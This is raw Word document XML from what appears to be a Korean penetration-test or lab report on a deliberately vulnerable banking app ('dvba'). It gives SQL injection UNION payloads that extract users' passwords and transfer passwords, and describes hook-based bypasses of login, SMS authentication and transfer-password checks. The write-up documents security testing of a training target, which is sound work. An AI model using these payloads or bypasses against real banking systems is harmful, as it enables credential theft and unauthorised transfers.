      <w:r w:rsidR="002A1397" w:rsidRPr="0069004F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="002A1397" w:rsidRPr="0069004F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데이터 추출 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F2475" w:rsidRDefault="008F2475" w:rsidP="002A1397">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="760"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F717F6" w:rsidRDefault="00F717F6">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1E13" w:rsidRPr="00C223A0" w:rsidRDefault="008F2475" w:rsidP="00FA1908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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step5</w:t>
      </w:r>
      <w:r w:rsidR="00AE7421" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 마이데이터 유저를 파악하기 위해 공격자 계정과 기존사용자계정의 차이 확인</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="7937" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7937"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FF1E13" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="00FF1E13" w:rsidRPr="00D92DA3" w:rsidRDefault="00FF1E13" w:rsidP="00D92DA3">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:spacing w:line="312" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>마이데이터 유저를 파악하기 위해 공격자 계정과 기존사용자계정의 차이 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF1E13" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF1E13" w:rsidRDefault="00FF1E13" w:rsidP="00CD38E9">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>"2023-07-11'union select 1,is_mydata, 3, 4, 5, 6,7 from dvba.users where username = 'john_doe' or username = 'chanwoong' ;--"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="19" w:name="_heading=h.1hmsyys" w:colFirst="0" w:colLast="0"/>
    <w:bookmarkEnd w:id="19"/>
    <w:p w:rsidR="000E593B" w:rsidRDefault="00F717F6" w:rsidP="00F717F6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0"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3F1E0B" wp14:editId="287071FA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>504190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>266065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="132080" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="20320" b="1651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8F4C" id="직사각형 21" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:39.7pt;margin-top:20.95pt;width:10.4pt;height:2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767506" wp14:editId="16745793">
            <wp:extent cx="5040000" cy="854133"/>
            <wp:effectExtent l="0" t="0" r="8255" b="31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96" w:rsidRDefault="006C1BB5" w:rsidP="00FF1E13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         </w:t>
      </w:r>
      <w:r w:rsidR="002A2F1E"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18097E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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="002A2F1E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="00E706BC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공격자계정과 기존 사용자 차이 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1E13" w:rsidRPr="00C223A0" w:rsidRDefault="00E34E71" w:rsidP="00BF1B24">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_heading=h.2grqrue" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Step6</w:t>
      </w:r>
      <w:r w:rsidR="00AE7421" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 기존 </w:t>
      </w:r>
      <w:r w:rsidR="00AE7421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사용자의 비밀번호와 이체비밀번호 추출</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="7937" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7937"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FF1E13" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="00FF1E13" w:rsidRPr="00D92DA3" w:rsidRDefault="00FF1E13" w:rsidP="00FF1E13">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:snapToGrid/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 w:rsidRPr="00D92DA3"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 xml:space="preserve">기존 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D92DA3">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>사용자의 비밀번호와 이체비밀번호 추출</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF1E13" w:rsidTr="00A730F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF1E13" w:rsidRDefault="00FF1E13" w:rsidP="00CD38E9">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD38E9">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2023-07-11'union select 1,username, password, accountPW, 5, 6, 7 from dvba.users where username='john_doe';--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000E593B" w:rsidRDefault="00F717F6" w:rsidP="00F717F6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="057EA7C7" wp14:editId="66F734AA">
                <wp:extent cx="5040000" cy="697865"/>
                <wp:effectExtent l="0" t="0" r="8255" b="6985"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697865"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4675505" cy="699135"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="55" name="그림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b="22078"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4675505" cy="69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직사각형 20"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="35858" y="224118"/>
                            <a:ext cx="4622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9AE11" id="그룹 28" o:spid="_x0000_s1026" style="width:396.85pt;height:54.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="46755,6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5" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:46755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">
                  <v:imagedata r:id="rId50" o:title="" cropbottom="14469f"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:rect id="직사각형 20" o:spid="_x0000_s1028" style="position:absolute;left:358;top:2241;width:4622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:rsidR="00BF1B24" w:rsidRPr="006C1BB5" w:rsidRDefault="006C1BB5" w:rsidP="006C1BB5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b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</w:t>
      </w:r>
      <w:r w:rsidR="00BF1B24" w:rsidRPr="006C1BB5"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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidR="00BF1B24" w:rsidRPr="006C1BB5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="00BF1B24" w:rsidRPr="006C1BB5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특정사용자의 정보 추출 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47319" w:rsidRDefault="00B47319">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00353EB1" w:rsidRPr="00176F06" w:rsidRDefault="00353EB1" w:rsidP="00353EB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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">마이데이터를 사용하고 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>정보 추출</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblpPr w:leftFromText="142" w:rightFromText="142" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="17"/>
        <w:tblW w:w="7937" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7937"/>
      </w:tblGrid>
      <w:tr w:rsidR="00353EB1" w:rsidTr="00A730F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="00353EB1" w:rsidRPr="00D92DA3" w:rsidRDefault="00353EB1" w:rsidP="00F717F6">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:snapToGrid/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Cs w:val="20"/>
              </w:rPr>
              <w:t>마이데이터 사용 유저 정보 추출</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00353EB1" w:rsidTr="00A730F5">
        <w:trPr>
          <w:trHeight w:val="140"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00353EB1" w:rsidRPr="003A6296" w:rsidRDefault="00353EB1" w:rsidP="00F717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</w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A6296">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:t>2023-07-11'union select if, username, password, accountPW, 5,6,7 from dvba.users where is_mydata=1;--</w:t>
            </w:r>
            <w:r w:rsidRPr="003A6296">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00353EB1" w:rsidRDefault="00F717F6" w:rsidP="00F717F6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA6AC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B373C3A" wp14:editId="610E4407">
            <wp:extent cx="5040000" cy="1736988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B1" w:rsidRDefault="006C1BB5" w:rsidP="00353EB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sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidR="00353EB1" w:rsidRPr="00157B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림 </w:t>
      </w:r>
      <w:r w:rsidR="00BF0260">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidR="00353EB1" w:rsidRPr="00157B80">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00353EB1" w:rsidRPr="00157B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>마이데이터 사용 유저 정보 추출 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353EB1" w:rsidRPr="00D736A5" w:rsidRDefault="00353EB1" w:rsidP="00D736A5">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47319" w:rsidRPr="00176F06" w:rsidRDefault="00BF1B24" w:rsidP="00B4731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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>로그인 우회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7B8F" w:rsidRPr="00C223A0" w:rsidRDefault="00BF1B24" w:rsidP="00BF1B24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color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr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로그인 시 입력한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pw</w:t>
      </w:r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를 암호화해주는 코드후킹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF1B24" w:rsidRPr="00C223A0" w:rsidRDefault="00FF1E13" w:rsidP="00BF1B24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color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="2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0" wp14:anchorId="33E91B70" wp14:editId="10CE592E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>308610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4679950" cy="871855"/>
                <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
                <wp:wrapTopAndBottom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871871"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4679104" cy="873162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b="15955"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4679104" cy="87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직사각형 18"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="170329" y="537882"/>
                            <a:ext cx="294640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41D8E" id="그룹 29" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:24.3pt;width:368.5pt;height:68.65pt;z-index:251769856;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-width-relative:margin;mso-height-relative:margin" coordsize="46791,8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" o:allowoverlap="f">
                <v:shape id="그림 56" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:4679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">
                  <v:imagedata r:id="rId53" o:title="" cropbottom="10456f"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:rect id="직사각형 18" o:spid="_x0000_s1028" style="position:absolute;left:1703;top:5378;width:29464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    <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BF1B24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리턴값을 로그인하려는 사용자 비밀번호의 해시값으로 변경</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47319" w:rsidRDefault="0018097E" w:rsidP="00353EB1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bookmarkStart w:id="21" w:name="_heading=h.3fwokq0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="22" w:name="_heading=h.1v1yuxt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="00BF1B24"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Pr="00BF1B24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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1B24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로그인 우회 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353EB1" w:rsidRPr="0018097E" w:rsidRDefault="00353EB1" w:rsidP="00353EB1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p w:rsidR="00EA2F96" w:rsidRPr="00176F06" w:rsidRDefault="00D95D1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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">마이데이터 </w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sms</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>인증 우회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018097E" w:rsidRPr="00C223A0" w:rsidRDefault="00D95D14" w:rsidP="0018097E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b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sms</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>인증페이지</w:t>
      </w:r>
      <w:r w:rsidR="004E1A18" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">를 후킹을 통해 우회하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mydata_send</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>함수 강제 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00960BD1" w:rsidRPr="00C223A0" w:rsidRDefault="00960BD1" w:rsidP="0018097E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b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">해당 취약점을 확인해보니 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sms</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>인증 완료 페이지도 강제 실행 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D95D14" w:rsidRPr="00722E55" w:rsidRDefault="00722E55" w:rsidP="00722E5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Chars="100" w:firstLine="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="573FE3BF" wp14:editId="4910EC67">
            <wp:extent cx="4679950" cy="1772285"/>
            <wp:effectExtent l="0" t="0" r="635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D1" w:rsidRDefault="0018097E" w:rsidP="00722E55">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="76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BF1B24"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Pr="00BF1B24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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1B24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마이데이터 이체 페이지 강제 실행 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018097E" w:rsidRPr="00557591" w:rsidRDefault="0018097E" w:rsidP="0018097E">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="760"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F525DB" w:rsidRPr="00176F06" w:rsidRDefault="00F525DB" w:rsidP="00D95D1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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>마이데이터 이체 시 이체비밀번호 우회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F525DB" w:rsidRPr="00C223A0" w:rsidRDefault="00F525DB" w:rsidP="00F525DB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color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr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이체 시 입력한 이체 비밀번호를 암호화해주는 코드후킹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F525DB" w:rsidRPr="00C223A0" w:rsidRDefault="00E5427A" w:rsidP="00F525DB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4A1957" wp14:editId="1ABAE3FE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>925830</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>704850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2834640" cy="132080"/>
                <wp:effectExtent l="0" t="0" r="22860" b="2032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D825" id="직사각형 8" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:72.9pt;margin-top:55.5pt;width:223.2pt;height:1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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F525DB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리턴값을 로그인한 사용자의 이체비밀번호 해시값으로 변경</w:t>
      </w:r>
      <w:r w:rsidR="00F525DB" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F525DB" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EC94265" wp14:editId="5A04DC3B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4676140" cy="746760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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296" w:rsidRDefault="0018097E" w:rsidP="00353EB1">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid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BF1B24"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Pr="00BF1B24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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1B24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="00A75096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마이데이터 이체 비밀번호 우회 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353EB1" w:rsidRPr="00353EB1" w:rsidRDefault="00353EB1" w:rsidP="00353EB1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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D95D14" w:rsidRPr="00176F06" w:rsidRDefault="00703062" w:rsidP="00D95D1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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>이체</w:t>
      </w:r>
